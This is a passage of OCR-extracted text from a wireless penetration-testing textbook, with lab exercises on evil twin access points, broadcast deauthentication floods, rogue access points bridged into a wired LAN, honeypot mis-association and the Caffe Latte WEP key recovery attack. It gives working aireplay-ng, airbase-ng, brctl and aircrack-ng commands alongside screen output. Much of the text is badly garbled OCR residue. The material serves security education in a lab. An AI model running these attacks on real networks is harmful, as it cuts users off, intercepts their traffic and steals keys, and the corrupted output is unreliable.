08: 
08: 
08: 
08: 
08: 
08: 
08: 
08: 
08: 
08: 
08: 
08: 
08: 
08: 
08: 


Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 


DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 


broadcast -- BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 


broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
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6. As we are closer to this client, our signal strength is higher and it connects to our Evil 
Twin access point as shown in the following screens: 


root@bt: ~ - Shell - Konsole 


Session Edit View Bookmarks Settings Help 








CH 11 ][ Elapsed: 0 s ][ 2011-03-05 08:43 


PWR RXQ Beacons #Data, #/s ENC CIPHER AUTH ESSID 


-71 WPA 
. OPN 
WPA 
OPN 
WPA 


TKIP PSK Sunny 


Wireless Lab 
«length: 0» 
Wireless Lab 
vivek 


TKIP PSK 


PWR Rate Lost Packets Probes 


60:FB:42:D5:E4:01 0 112 Wireless 


root@bt: ~ - Shell - Konsole <2> 





root@bt:-# airbase-ng -a AA:AA:AA:AA:AA:AA --essid "Wireless Lab" -c 11 mond 
08:39: Created tap interface at0 
08: Trying to set MTU on atO to 1500 


08: Access with BSSID AA:AA:AA:AA:AA:AA started. 


08: 
08: 
08: 
08: 
08: 
08: 
08: 
08: 
08: 
08: 
08: 





Session 


Client 
Client 
Client 
Client 
Client 
Client 
Client 
Client 
Client 
Client 
Client 


We can also spoof the BSSD and MAC address of the access point using the following 


command: 


Edit View Bookmarks 


Settings 


Help 


associated 
associated 
associated 
associated 
associated 
associated 
associated 
associated 
associated 
associated 
associated 


(unencrypted) 
(unencrypted) 
(unencrypted) 
(unencrypted) 
(unencrypted) 
(unencrypted) 
(unencrypted) 
(unencrypted 
(unencrypted 
(unencrypted 
(unencrypted 


) 
) 
) 
) 


: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 





root@bt: ~ - Shell - Konsole <2> 





root@bt:-# airbase-ng -a 00:21:91:D2:8E:25 --essid "Wireless Lab" -c 11 mond 
Created tap interface at0 


Trying to set MTU on atO to 1500 
Access Point with BSSID 00:21:91:D2:8E:25 started. 
Client 60:FB:42:D5:E4:01 associated (unencrypted) to ESSID: "Wireless Lab" 
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8. Now if we see through ai rodump- ng itis almost impossible to differentiate 
between both visually: 


root@bt: ~ - Shell - Konsole 
Session Edit View Bookmarks Settings Help 


CH 11 ][ Elapsed: 0 s ][ 2011-03-05 08:47 


BSSID PWR RXQ Beacons #Data, #/s CH ENC CIPHER AUTH ESSID 


00:22:7F:65:0A:99 -1 0 0 158 WPA «length: 0» 
00:1bE:40:53:02:FC -40 10 0 11 WPA TKIP  PSK vivek 
00:17:7C:09:CF:10 -72 8 0 11 WPA TKIP PSK Sunny 
00:21:91:D2:8E:25 -1 30 0 11 OPN Wireless Lab 


BSSID STATION PWR Rate Lost Packets Probes 
00:21:91:D2:8E:25 60:FB:42:D5:E4:01 -14 0 1 Wireless 


"LC 
rootebt:~# J 





9. Evenairodump- ng is unable to differentiate that there are actually two different 
physical access points on the same channel. This is the most potent form of the 
evil twin. 


X 3599: 4 
We created an Evil Twin for the authorized network and used a De-authentication 


attack to have the legitimate client connect back to us, instead of the authorized network 
access point. 





It is important to note that in the case of the authorized access point using encryption such 
as WEP/WPA, it might be more difficult to conduct an attack in which traffic eavesdropping 
may be possible. We will look at how to break the WEP key with just a client using the Caffe 
Latte attack in a later chapter. 


In the previous exercise, run the evil twin on different channels and observe how the client, 
once disconnected, would hop channels to connect to the access point. What is the deciding 
factor upon which the client decides which access point to connect to? Is it signal strength? 
Experiment and validate. 


sCeedk 
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Cp BERRA T.V 


A Rogue access point is an unauthorized access point connected to the authorized network. 
Typically, this access point can be used as a backdoor entry by an attacker, thus enabling him 
to bypass all security controls on the network. This would mean that the firewalls, intrusion 
prevention systems, and so on, which guard the border of a network would be able to do 
little to stop him from accessing the network. 


In the most common case, a Rogue access point is set to Open Authentication and no 
encryption. The Rogues access point can be created in two ways: 


1. Installing an actual physical device on the authorized network as a Rogue access 
point. This will be something; | leave as an exercise to you. Also, more than 
wireless security, this has to do with the breach of physical security of the 
authorized network. 


2. Creating a Rogue access point in software and bridging it with the local authorized 
network Ethernet Network. This will allow practically any laptop running on the 
authorized network to function as a Rogue access point. We will look at this in the 
next experiment. 





Time for action — Rogue access point 


Follow these instructions to get started: 


1. Let us first bring up our Rogue access point using ai rbase- ng and give it the 
ESSID Rogue: 


root@bt: ~ - Shell - Konsole 
Session Edit View Bookmarks Settings Help 


rootebt:-# airbase-ng --essid Rogue -c 11 mond 
11:01:49 Created tap interface at0 
11:01:49 Trying to set MTU on atO to 1500 


11:01:49 Access Point with BSSID 00:C0:CA:3E:BD:93 started. 





Chapter 5 


2. We now want to create a bridge between the Ethernet Interface which a part of the 
authorized network and our Rogue access point interface. To do this we will first 
create a bridge interface and name it Wi f i -Bri dge: 


Session Edit View Bookmarks Settings Help 


[-ootabt:-# brctl addbr Wifi-Bridge 


root(bt :~# 
root@bt :~# 
rootàbt:-£ $ 











3. We will then add both the Ethernet and the atO virtual interface created by 
al rbase-ng to this bridge: 


t:~# 

abt : ~# 
tobt:-# brctl addif Wifi-Bridge ethO 
ot:-# brctl addif Wifi-Bridge at0 

Dd 


--# 





4, \Newill then bring with these interfaces up to bring the bridge up" 


Session Edit View Bookmarks Settings Help 


rootabt:~# ifconfig ethO 0.0.0.0 up 
rootebt:~# ifconfig atO 0.0.0.0 up 
root@bt :~# 

root(bt :~# 

rootgbt:-£ B 





5. We will then enable IP forwarding in the kernel to ensure packets are forwarded: 


root@bt: ~ - 
Session Edit View Bookmarks Settings Help 


|rootabt :~# echo 1 > /proc/sys/net/ipv4/ip forward 


root@bt :~-# 
rootabt:~# J 
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6. Brilliant! We are done. Now any wireless client connecting to our Rogue access 
point will have full access to the authorized networking using the wireless-to-wired 
"Wifi-Bridge" we just built. We can verify this by first connecting a client to the 
Rogue access point. Once connected, if you are using Vista, your screen might look 
like the following: 


wy c5. Set Network Location 


Successfully set network settings 


Network name: Rogue 
E Location type: Private 
| This allows you to see other computers and 


devices, while making your computer 
discoverable. 


View or change network and sharing settings in Network and Sharing Center 


View computers and devices on the network 





7. \Newill notice it receives an IP address from the DHCP daemon running on the 
authorized LAN: 


dil] Wireless Network Connection Status 
Network Connection Details 
Network Connection Details: 


Property Value 
Connection-specific DN... 

Description Intel(R) WiFi Link 5100 
Physical Address 00-22-FB-35-FC-44 
DHCP Enabled No 

IPv4 IP Address 192.168.1.10 

IPv4 Subnet Mask 255.255.255.0 

IPv4 Default Gateway 192.168.1.1 

IPv4 DNS Server 192.168.1.1 

IPv4 WINS Server 

NetBIOS over Tcpip En... Yes 

Link4ocal IPv6 Address fe80::693d fad9:1424:c019%11 
IPv6 Default Gateway 

IPv6 DNS Server 














"Coe 
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8. We can now access any host on the wired network from this wireless client using 
this Rogue access point. Next, we are pinging the gateway on the wired network: 


EA CMD Shell 


c: ping 192.168.1.1 


Finging 192.168.1.1 with 32 bytes of data: 

Reply from 192.168.1.1: bytes=32 time=ĝ3ms TIL=64 
Reply from 192.168.1.1: bytes=32 time=2ms TIL=64 
Reply from 192.168.1.1: bytes=32 time=2ms TIL=64 
Reply from 192.168.1.1: bytes=32 time=2ms TIL=64 


Ping statistics For 192.168.1.1: 
Packets: Sent = 4, Received = 4, Lost = @ Cy 
Approximate round trip times in milli-seconds: 


Minimum = 2ms. Maximum = 3ms. Average = 2ms 


co‘? 
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We created a Rogue access point and used it to bridge all the authorized network LAN traffic 


over the wireless network. As you can see, this is a really serious security threat as anyone 
can break into the wired network using this bridge. 





Check if you can create a Rogue access point which uses WPA/WPA2-based encryption to 
look more legitimate on the wireless network. 


1. What encryption does a Rogue access point use in most cases? 





a. None 

b. WEP 
WPA 

d. WPA2 
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Attacks on the WLAN Infrastructure 


2. In Evil Twin, having the same MAC address as the authorized access point: 
a. Makes detecting the Evil Twin more difficult 
b. Forces the client to connect to it 
c. Increases the signal strength of the network 


d. None ofthe above 


3. DoS attacks: 
a. Bring down the overall throughput of the network 
b. Donottarget the clients 
c. Canonly be done if we know the network WEP/WPA/WPA2 credentials 
d. Allof the above 


4. Rogue access points: 
a. Allow for a backdoor entry into the authorized network 
b. Use WPA2 encryption only 
c. Can be created as a software-based access point or can be an actual device 
d. Both (a) and (c) 


OORT 


In this chapter, we have explored the following ways to compromise the security of the 
Wireless LAN infrastructure: 

Compromising default accounts and credentials on access points 

Denial of service attacks 


Evil twins and MAC spoofing 


©% 9 9 o 


Rogue access points in the enterprise network 


In the next chapter, we will look at different attacks on the Wireless LAN client. Interestingly, 
most administrators feel the client has no security problems to worry about. We will see how 
nothing could be farther away from the truth. 





QWSISREE: Vick 5:46 IV 


"Security is just as strong as the weakest link." 
Famous Quote in Information Security Domain 


infrastructure and don't give the wireless client even a fraction of that. 
However, it is interesting to note that a hacker can gain access to the 
authorized network by compromising a wireless client as well. 


mJ 
Q Most penetration testers seem to give all the attention to the WLAN 


In this chapter, we will shift our focus from the WLAN infrastructure to the wireless client. 
The client can be either a connected or isolated un-associated client. We will look at various 
attacks, which can be used to target the client. 


We will cover the following: 


Honeypot and Mis-Association attacks 
Caffe Latte attack 
De-Authenticaton and Dis-Association attacks 


Hirte attack 
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AP-less WPA-Personal cracking 


Attacking the Client 


Honeypot and Mis-Association attacks 


Normally, when a wireless client such as a laptop is turned on, it will probe for the networks 
it has previously connected to. These networks are stored in a list called the Preferred 
Network List (PNL) on Windows-based systems. Also, along with this list, it will display any 
networks available in its range. 


A hacker may do either of two things: 


1. Silently monitor the probe and bring up a fake access point with the same ESSID the 
client is searching for. This will cause the client to connect to the hacker machine, 
thinking it is the legitimate network. 


2. He may create fake access points with the same ESSID as neighboring ones to 
confuse the user to connect to him. Such attacks are very easy to conduct in coffee 
shops and airports where a user might be looking to connect to a Wi-Fi connection. 


These attacks are called Honeypot attacks, which happen due to Mis-Association to the 
hacker's access point thinking it is the legitimate one. 


In the next exercise, we will do both these attacks in our lab. 


Time for action — orchestrating a Mis-Association attack 


Follow these instructions to get started: 





1. Inthe previous labs, we used a client that had connected to the Wireless Lab access 
point. Let us switch on the client but not the actual Wireless Lab access point. Let 
us now runal rodump-ng mond and check the output. You will very soon find the 
client to be in not associated mode and probing for Wireless Lab and other SSIDs in 
its stored profile (Vivek as shown): 


HOOK K 


Chapter 6 


7 re root@bt: ~ - Shell - Konsole 


Session Edit View Bookmarks Settings Help 





CH 3 ][ Elapsed: 2 mins ][ 2011-03-23 11:17 
BSSID PWR RXQ Beacons #Data, #/s CH ENC CIPHER AUTH ESSID 


00:1E:40:53:02:FC -50 17 1454 WPA TKIP  PSK vivek 

00:25:5E:17:C8:00 -71 0 4 WEP WEP swapnil 
00:25:5E:17:C8:02 -70 0 3 OPN «length: 
00:25:5E:17:C8:01 -70 0 3 OPN «length: 
00:25:5E:17:C8:03 -70 0 3 OPN «length: 


BSSID STATION Packets Probes 


(not associated) 00:16:44:19:DF: 21 

(not associated) 00:24:D2:FE:7F: 5 

(not associated) 90:4C:E5:30:42: 4 

(not associated) 00:26:B6:11:67: 5 FinAirWifi 

(not associated) 60:FB:42:D5:E4: 144 Wireless Lab,Vivek 
00:1bE:40:53:02:FC 3 C8:BC:C8:EE:12: 45 vivek 
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2. Tounderstand what is happening, let's run Wireshark and start sniffing on the monO 
interface. As expected you might see a lot of packets, which are not relevant to our 
analysis. Apply a Wireshark filter to only display Probe Request packets from the 
client MAC you are using: 


Protoco | Info 
IEEE 8U. Beacon trame, SN=25, FNSU, Flags=........ C, BISIUU, SSID="VIVEK™ 


IEEE 80:Probe Request, SN=1793, FN=0, Flags=........ C, SSID-Broadcast 
IEEE 80:Probe Request, SN-1795, FN=0, Flags=........ C, SSID-Broadcast 
IEEE 80:Beacon frame, SN=67, FN=0, Flags=........ C, BI=100, SSID="vivek" 
IEEE 80:Beacon frame, SN=89, FN=O, Flags= NES C, BI-100, SSID="vivek" 
IEEE 80:Beacon frame, SN-110, FN=0, Flags=........ C, BI=100, SSID="vivek" 
IEEE 80:Beacon frame, SN=131, FN=0, Flags=........ C, BI=100, SSID="vivek" 
IEEE 80:Beacon frame, SN=153, FN=0, Flags=........ C, BI=100, SSID="vivek" 
IEEE 80:Probe Request, SN=1798, FN-0, Flags=........ C, SSID="Wireless Lab" 
IEEE 80:Beacon frame, SN=174, FN=0, Flags=........ C, BI=100, SSID="vivek" 
IEEE 80:Probe Request, SN=1799, FN-0, Flags=........ C, SSID="Wireless Lab" 
IEEE 80:Probe Request, SN=1800, FN=0, Flags=........ C, SSID="Wireless Lab" 
IEEE 80:Beacon frame, SN=217, FN=0, Flags=........ C, BI=100, SSID="vivek" 
IEEE 80:Probe Request, SN=1802, FN=0, Flags=........ C, SSID="Wireless Lab" 
IEEE 80:Beacon frame, SN=238, FN=0, Flags=........ C, BI=100, SSID="vivek" 











top ok 


Attacking the Client 


3. In my case, the filter would be wlan.fc.type subtype == 0x04 && wlan.sa == 
60:FB:42:D5:E4:01. You should now see Probe Request packets only from the client 
for the SSIDs Vivek and Wireless Lab: 





| Protoco | Info 

IEEE 80:Probe SN=1795, SSI D=Broadcast 
80: Probe SN-1798, SSID-"Wireless 
80: Probe SN=1799, SSID="Wireless 
80: Probe SN=1800, SSID-"Wireless 
80: Probe SN=1802, SSID-"Wireless 
80; Probe SN=1806, SSID-"Wireless 
80: Probe SN=1809, SSID=" Vivek" 
80: Probe SN=1811, SSID=" Vivek" 
80: Probe SN-1812, SSID=" Vivek" 
80; Probe SN-1813, SSID=" Vivek" 
80: Probe SN=1819, SSID=" Vivek" 
80: Probe SN=1820, SSID-"Wireless 
80: Probe SN-1822, SSID-"Wireless 
80; Probe SN-1824, SSID-"Wireless 
80; Probe SN=1830, SSID-"Wireless 





4. Let us now start a fake access point for the network Wireless Lab on the hacker 
machine using the command shown next: 


root@bt: ~ - Shell - Konsole 


|Menubn Edit View Bookmarks Settings Help 


rootebt:-# airbase-ng --essid "Wireless Lab" -c 3 mon0 
12:47:59 Created tap interface at0 
12:47:59 Trying to set MTU on at0 to 1500 





Trying to set MTU on monO to 1800 
Access Point with BSSID 00:C0:CA:3E:BD:93 started. 





Chapter 6 


5. Within a minute or so, the client would connect to us automatically. This shows how 
easy it is to have un-associated clients. 


root@bt: ~ - Shell - Konsole 
Session Edit View Bookmarks Settings Help 


|rootebt:i-4 airbase-ng --essid "Wireless Lab" -c 3 mon0 
Created tap interface at0 
Trying to set MTU on atO to 1500 


Trying to set MTU on monO to 1800 
Access Point with BSSID 00:C0:CA:3E:BD:93 started. 


Client 60:FB:42:D5:E4:01 associated (unencrypted) to ESSID: "Wireless Lab" 





6. Now, we will try the second case, which is creating a fake access point Wireless Lab 
in the presence of the legitimate one. Let us turn our access point on to ensure that 
Wireless Lab is available to the client. For this experiment, we have set the access 
point channel to 3. Let the client connect to the access point. We can verify this 
from the ai rodump- ng screen as shown next: 


root@bt: ~ - Shell - Konsole 
on Edit View Bookmarks Settings Help 





CH 3 ][ Elapsed: 40 s ][ 2011-03-23 12:56 
BSSID PWR RXQ Beacons #Data, #/s ENC CIPHER AUTH ESSID 


00:21:91:D2:8bE:25 -27 100 379 . OPN Wireless Lab 
00:1bE:40:53:02:FC -47 87 387 WPA TKIP PSK vivek 
00:25:5E:17:C8:01 -69 © OPN «length: 0» 
00:25:5E:17:C8:00 -70 1 WEP WEP swapnil 
00:25:5E:17:C8:03 -70 © OPN «length: 0» 


BSSID STATION Lost Packets Probes 


(not associated) 4 

(not associated) : 3 

(not associated) :26:5E:17:AA: 30 40 brindavan 

(not associated) :24:D6:2C:D3: 2 

(not associated) :23:4E:3A:A3: - 0 1 

00:21:91:D2:8E:25 : 36e-24e 337 329 Wireless Lab,Vivek 


root@bt: ~ - Shell - Konsole 
Edit View Bookmarks Settings Help 


root@bt:~# airbase-ng --essid "Wireless Lab" -c 3 mono 
12:57:27 Created tap interface at 

12:57:27 Trying to set MTU on atO to 1500 

12:57:27 Access Point with BSSID 00:C0:CA:3E:BD:93 started. 
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Attacking the Client 


8. Notice the client is still connected to the legitimate access point Wireless Lab: 


Fy fol root@bt: ~ - Shell - Konsole 


|Menu)n Edit View Bookmarks Settings Help 





CH 3 ][ Elapsed: 12 s ][ 2011-03-23 12:58 


BSSID 


00:21:91:D2:8E:25 
00:1E:40:53:02:FC 


PWR RXQ Beacons 


-21 87 
-48 87 


131 
122 


#Data, #/s 


5 0 
0 0 


CH MB 


ENC CIPHER AUTH ESSID 


3 54e. OPN 


1 54 


WPA TKIP 


Wireless Lab 
PSK vivek 


BSSID STATION Rate Lost Packets Probes 


6 brindavan 
2 FinAirWifi 
1 
171 Wireless Lab, Vivek 


00:26:5 


E:17:AA:93 1 
00:26:B6: 

6: 

2: 


1 
:67 :E5 0 
:D3:40 0 
:E4:01 7 


(not associated) 
(not associated) 
(not associated) 
00:21:91:D2:8E:25 


00:24:D 


7 
1 
C 
60:FB:42:D5 


1 
1 
2 
D 





9. We will now send broadcast De-Authentication messages to the client on behalf of 
the legitimate access point to break their connection: 


m 5 


root@bt: ~ - Shell No. 2 - Konsole 


Menuf n Edit View Bookmarks Settings Help 


root@bt:~# aireplay-ng --deauth 0 -a 00:21:91:D2:8E:25 mond 
13:32:14 Waiting for beacon frame (BSSID: 00:21:91:D2:8E:25) on channel 3 
NB: this attack is more effective when targeting 





13: 
13: 
13: 
213 
13: 
13: 
13: 
13: 
13: 
13: 
RE 
I3: 
13: 
13: 
13: 
133 


Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 
Sending 


a connected wireless client 


DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 
DeAuth 


to 
to 
to 
to 
to 
to 
to 
to 
to 
to 
to 
to 
to 
to 
to 
to 
to 
to 
to 
to 
to 
to 


(-c «client's mac»). 
broadcast -- BSSID: 


broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 
broadcast 


BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
BSSID: 
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10. Assuming the signal strength of our fake access point Wireless Lab is stronger than 
the legitimate one to the client, it connects to our fake access point, instead of the 
legitimate access point: 


root@bt: ~ - Shell No. 3 - Konsole 


Session Edit View Bookmarks Settings Help 





rootebt:-# airbase-ng --essid "Wireless Lab" -c 3 mon0 
13:26:11 Created tap interface at0 


13:26:11 Trying to set MTU on at0 to 1500 
Access Point with BSSID 00:C0:CA:3E:BD:93 started. 
Client 60:FB:42:D5:E4:01 associated (unencrypted) to ESSID: "Wireless Lab" 





11. We can verify the same by looking at the ai rodump- ng output to see the new 
association of the client with our fake access point: 


m m root@bt: ~ - Shell - Konsole 
|Menubi Edit View Bookmarks Settings Help 


CH 3 ][ Elapsed: 1 min ][ 2011-03-23 13:33 





PWR RXQ Beacons #Data, #/s ENC CIPHER AUTH ESSID 


234 OPN Wireless Lab 
. OPN Wireless Lab 
WPA TKIP PSK vivek 
WPA TKIP PSK laxmi 
OPN «length: 0» 
WEP WEP swapnil 
OPN «length: 0» 


Packets Probes 


Wireless Lab 
(not associated) brindavan 
(not associated) 
(not associated) 
(not associated) 
(not associated) 
(not associated) 
(not associated) 
00:1E:40:53:02:FC 


Anoop 


FinAirWifi 


|]IOOOOOOOoOnmzB 
CO HB HÍ|BHBHEBHBHEBHBHBPOoo 
cOOcOOOooooooo 
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Attacking the Client 


X GEV OAK CE TES 
We just created a Honeypot using the probed list from the client and also using the same 
ESSID as that of neighboring access points. In the first case, the client automatically 
connected to us as it was searching for the network. In the latter case, as we were closer to 
the client than the real access point, our signal strength was higher, and the client connected 
to us. 









In the preceding exercise, what do we do if the client does not automatically connect to us? 
We would have to send a De-Authentication packet to break the legitimate client-access 
point connection and then if our signal strength is higher, the client will connect to our 
spoofed access point. Try this out by connecting a client to a legitimate access point, and 
then forcing it to connect to our Honeypot. 


Caffe Latte attack 


In the Honeypot attack, we noticed that clients will continuously probe for SSIDs they have 
connected to previously. If the client had connected to an access point using WEP, operating 
systems such as Windows, cache and store the WEP key. The next time the client connects to 
the same access point, the Windows wireless configuration manager automatically uses the 
stored key. 


The Caffe Latte attack was invented by me, the author of this book and was demonstrated 

in Toorcon 9, San Diego, USA. The Caffe Latte attack is a WEP attack which allows a hacker 

to retrieve the WEP key of the authorized network, using just the client. The attack does not 
require the client to be anywhere close to the authorized WEP network. It can crack the WEP 
key using just the isolated client. 


In the next exercise, we will retreive the WEP key of a network from a client using the Caffe 
Latte attack. 


Time for action — conducting the Caffe Latte attack 


Follow these instructions to get started: 





1. Let us first set up our legitimate access point with WEP for the network Wireless Lab 
with the key ABCDEFABCDEFABCDEF12 in Hex: 


Chapter 6 
WIRELESS NETWORK SETTINGS 


Enable Wireless: |V| | Always 1$] { Add New | 
Wireless Network Name : wireless Lab (Also called the SSID) 


802.11 Mode: | Mixed 802.11n, B02.11g and B02.115 H4 


Enable Auto Channel Scan: .. 


Wireless Channel: | 2.422 GHz - CH 3 B 
Transmission Rate: | Best (automatic) Hd (Mbit/s) 
Channel Width : | 20 MHz B 


Visibility Status: Visible © Invisible 


WIRELESS SECURITY MODE 


To protect your privacy you can configure wireless security features. This device supports three 
wireless security modes, including WEP, WPA-Personal, and WPA-Enterprise. WEP is the original 
wireless encryption standard. WPA provides a higher level of security. WPA-Personal does not require 
an authentication server. The WPA-Enterprise option requires an external RADIUS server. 


Security Mode: | WEP Hd 


WEP is the wireless encryption standard. To use it you must enter the same key(s) into the router 
and the wireless stations. For 64 bit keys you must enter 10 hex digits into each key box. For 128 bit 
keys you must enter 26 hex digits inta each key box. A hex digit is either a number from 0 to 9 or a 
letter from A to F. For the most secure use of WEP set the authentication type to "Shared Key" when 
WEP is enabled. 


You may also enter any text string inta a WEP key box, in which case it will be converted into a 
hexadecimal key using the ASCII values of the characters. A maximum of 5 text characters can be 
entered for 64 bit keys, and a maximum of 13 characters for 126 bit keys. 


If you choose the WEP security option this device will ONLY operate in Legacy Wireless mode 
(802.11B/G). This means you will NOT get 11M performance due to the fact that WEP is not 
supported by Draft 11M specification. 


WEP Key Length : | 128 bit (25 hex digits) (length applies to all keys) 


WEP Key 12: |ssssosassssssossssa0000000 

WEP Kay 2: Loser HM ERE 

WEP Key 3: | oeessoseteséée dade dd Re RR 

WEP Key Cd Pre 
Default WEP Key: | WEPKey1 +] 
Authentication : | Shared Key || 
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Attacking the Client 


2. Let us connect our client to it and ensure that the connection is successful using 
al rodump- ng as shown next: 


root@bt: ~ - Shell - Konsole 
on Edit View Bookmarks Settings Help 





CH 3 ][ Elapsed: 0 s ][ 2011-03-23 14:45 


PWR RXQ Beacons #Data, #/s CIPHER AUTH ESSID 


:CF:D5:13:11 -66 TKIP PSK laxmi 
:5E:17:C8:03 -69 «length: 0» 
:5E:17:C8:00 -70 WEP swapnil 
:40:53:02:FC -56 7 TKIP PSK vivek 
:91:D2:8E:25 -14 8 54e. WEP WEP Wireless Lab 


STATION PWR Rate Lost Packets Probes 


(not associated) X E4:EC:10:4F:AD:74 -67 0-1 93 14 Anoop 
00:21:91:D2:8bE:25 60:FB:42:D5:E4:01 -28 0 -36e 13 81 Wireless Lab,Vivek 





3. Letusunplug the access point and ensure the client is in the un-associated stage 
and searching for the WEP network Wireless Lab: 


n o root@bt: ~ - Shell - Konsole 


|Menubn Edit View Bookmarks Settings Help 





CH 3 ][ Elapsed: 8 s ][ 2011-03-23 14:46 

BSSID PWR RXQ Beacons #Data, #/s CH ENC CIPHER AUTH ESSID 
00:25:5E:17:C8:00 -71 © 3 0 0 1 WEP WEP swapnil 
00:1bE:40:53:02:FC -50 100 72 1 0 1 WPA TKIP PSK vivek 
00:02:CF:D5:13:11 -68 16 9 0 0 2 WPA TKIP PSK laxmi 
BSSID STATION Lost Packets Probes 


(not associated) 60:FB:42:D5:E4:01 32 16 Wireless Lab, Vivek 





4. Nowweuseairbase-ng to bring up an access point with Wireless Lab as the SSID 
with the parameters shown next: 


g root@bt: ~ - Shell No. 3 - Konsole 
Session Edit View Bookmarks Settings Help 


[rootebt:-K airbase-ng -c 3 -a 00:21:91:D2:8E:25 -e "Wireless Lab" -L -W 1 mon 
14:47:12 Created tap interface at0 
14:47:12 Trying to set MTU on at0 to 1500 


14:47:13 Access Point with BSSID 00:21:91:D2:8E:25 started. 
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5. As soon as the client connects to this access point, ai r base- ng starts the Caffe- 


Latte attack as shown: 


root@bt: ~ - Shell No. 3 - Konsole 


Session Edit View Bookmarks Settings Help 





rootebt:-# airbase-ng -c 3 -a 00:21:91:D2:8E:25 -e "Wireless Lab" -L -W 1 monO 
14:48:18 Created tap interface at0 

:48:18 Trying to set MTU on atO0 to 1500 

:48:18 Access Point with BSSID 00:21:91:D2:8E:25 started. 


140 bytes keystream: 60:FB:42:D5:E4:01 
from :FB:42:D5:E4: 

from 

from 

from 

from 

from 

from 

from 


associated 
associated 
associated 
associated 
associated 
associated 
associated 
associated 
associated 
associated 
associated 
associated 


Starting Caffe-Latte attack against 


: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 
: "Wireless 


Lab" 
Lab" 
Lab" 
Lab" 
Lab" 
Lab" 
Lab" 
Lab" 
Lab" 
Lab" 
Lab" 
Lab" 


:01 at 100 pps. 





6. Wenowstart ai rodump- ng to collect the data packets from this access point only, 


as we did before in the WEP-cracking case: 


root@bt: ~ - Shell - Konsole <2> 


Session Edit View Bookmarks Settings Help 





CH 11 ][ Elapsed: 30 mins ][ 2011-02-06 04:01 ][ 140 bytes keystream: 00:21:91:D2:8E:25 


BSSID PWR RXQ Beacons 
00:21:91:D2:8E:25 -6 100 16387 11190 
BSSID STATION PWR Rate 


00:21:91:D2:8bE:25 60:FB:42:D5:E4:01 0 





sicegot 


#Data, #/s CH MB 


Lost Packets 


0 22026 Wireless Lab 


ENC CIPHER AUTH ESSID 


0 11 54e. WEP WEP 


Probes 


SKA Wireless Lab 


Attacking the Client 


7. Wealsostartai rcrack-ng asin the WEP-cracking exercise we did before to begin 
the cracking process. The command line would be ai rcrack-ng filename where 
filename is the name of the file created by ai rodump- ng: 


root@bt: ~ - Shell - Konsole <3> 
Session Edit View Bookmarks Settings Help 





Aircrack-ng 1.0 r1645 


[00:00:04] Tested 331777 keys (got 11111 IVs) 


fo 
(D 
"UO 
ct 
-g 


byte (vote) 


© 
^ 


(OD CO - O» Ui 4» GJ hJ F2 C UJ 


O» QJ hJ CJ 4 hJ 4 UC) 4 NJ C) P DN 


AB(17664) 
DD(17664) 
92(15872) 
7C(16896) 
0B(15872) 
46 (14848) 
2B(15104) 
56 (15872) 
02 (14848) 
B3 (16384) 
5B( 15616) 
C8 (15616) 
6B(15104) 


1D (16640) 
78 (16384) 
84(15616) 
FF (16384) 
CB(15616) 
47(14592) 
44(14592) 
0C (14848) 
D4(14592) 
5E (15872) 
03(14592) 
A6(15360) 
15(14848) 


the key as shown next: 


Session 


Edit View Bookmarks Settings Help 


5A( 15360) 
BO (16384) 
1A(15360) 
7A(16128) 
OF (15104) 
5C (14592) 
A4(14592) 
21(14848) 
E4(14592) 
D4(15872) 
24(14592) 
39(15104) 
57(14848) 


root@bt: ~ - Shell - Konsole <3> 


BA( 15360) 
25(15104) 
38(15104) 
12 (15360) 
B1(15104) 
9A (14336) 
EC(14592) 
5C(14848) 
11(14336) 
4C(15104) 
5F(14592) 
D7(14848) 
70(14592) 


D1(15104) 
48(14848) 
14(14848) 
47(15360) 
A9 (14848) 
30(14080) 
24(14080) 
D8(14848) 
13(14336) 
EB(14848) 
68(14592) 
95(14592) 
CE(14592) 


07(14848 


E8(14848) 
79(14336) 
) 


( 
( 
A1(14592 
85(15104) 
2A(14592 
sta pias 
3B ( 

2C (14336 
BC (14336 
BC (14592 
5E (14336) 
46 (14336) 
6F (14336) 


FO (14848) 
OF (14080) 
C1(14592) 
94(15104) 
36(14592) 
6A(14080) 
6D(14080) 
40(14336) 
46(14080) 
E0(14592) 
